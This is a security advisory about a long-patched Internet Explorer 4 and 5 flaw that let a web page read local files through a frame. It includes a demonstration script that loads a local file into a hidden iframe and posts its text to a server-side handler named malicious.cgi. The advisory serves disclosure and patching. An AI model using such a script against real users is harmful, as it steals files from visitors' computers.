Skip navigation
Menu
Security

IE Frame Domain Verification

 
IE Frame Domain Verification
Reported May 19 by Andrew Nosenko

VERSIONS EFFECTED
  • Internet Explorer 4.x
  • Internet Explorer 5.x

    DESCRIPTION

    When a web server opens a frame within a window, the IE security model should only allow the parent window to access the data in the frame if they are in the same domain. However, two functions available in IE do not properly perform domain checking, with the result that the parent window could open a frame that contains a file on the local computer, then read it. This could allow a malicious web site operator to view files on the computer of a visiting user. The web site operator would need to know (or guess) the name and location of the file, and could only view file types that can be opened in a browser window.

    DEMONSTRATION

    <iframe id=clientContent width=0 height=0 noborder>
    </iframe>
    <script for=clientContent event="DocumentComplete(browser)">
    alert (browser.document.body.innerText);

    // browser is an instance of the IWebBrowser COM object

    document.forms\[0\].elements\[0\].value = browser.document.body.innerText;
    document.forms\[0\].submit ();

    </script>

    <script>
    clientContent.navigate("c:\\some_file.txt")
    </script>
    <form action="/cgi/malicious.cgi" method=post onSubmit="window.alert(document.forms\[0\].elements\[0\].value); return
    true">
    <input name="file_text" type=hidden>
    </form>

    VENDOR RESPONSE

    Microsoft has issued a patch for the problem.

    The patches require IE 4.01 Service Pack 2 or IE 5.01 to install. Customers using versions prior to these may receive a message reading "This update does not need to be installed on this system". This message is incorrect. More information is available in KB article Q262509.

    - Frequently Asked Questions: Microsoft Security Bulletin MS00-033,
    http://www.microsoft.com/technet/security/bulletin/fq00-033.asp

    - Knowledge Base article Q262509 discusses the overall patch

    - Knowledge Base articles Q251108 and Q255676 discuss the "Frame Domain Verification" vulnerability

    - Microsoft Knowledge Base article Q258430 discusses the
    "Unauthorized Cookie Access" vulnerability

    - Microsoft Knowledge Base article Q261257 discusses the
    "Malformed Component Attribute" vulnerability

    - Microsoft Knowledge Base (KB) article Q247333,
    Web Proxy Auto-Discovery "Spoofing" May Change Proxy Settings,
    http://www.microsoft.com/technet/support/kb.asp?ID=247333

    - Microsoft TechNet Security web site,
    http://www.microsoft.com/technet/security/default.asp

    CREDITS
    Discovered and reported by Andrew Nosenko

    		•
    Hide comments

    More information about text formats

    Comments

    • Allowed HTML tags: <em> <strong> <blockquote> <br> <p>

    Plain text

    • No HTML tags allowed.
    • Web page addresses and e-mail addresses turn into links automatically.
    • Lines and paragraphs break automatically.
    Publish
    Recommended Reading
    Businesswoman challenges concept and gender obstacles
    Women in Cybersecurity Face Barriers to Hiring, Advancement
    Apr 15, 2024
    person typing on keyboard with icons for certificates
    Top IT Certifications for a Career in Finance
    Apr 12, 2024
    employee working on a laptop with AI
    Why AI Coding Assistants May Be Greatest Cybersecurity Threat Facing Your Business
    Mar 26, 2024
    cleaning products
    6 Essential Steps for Spring Cleaning Your Website
    Mar 21, 2024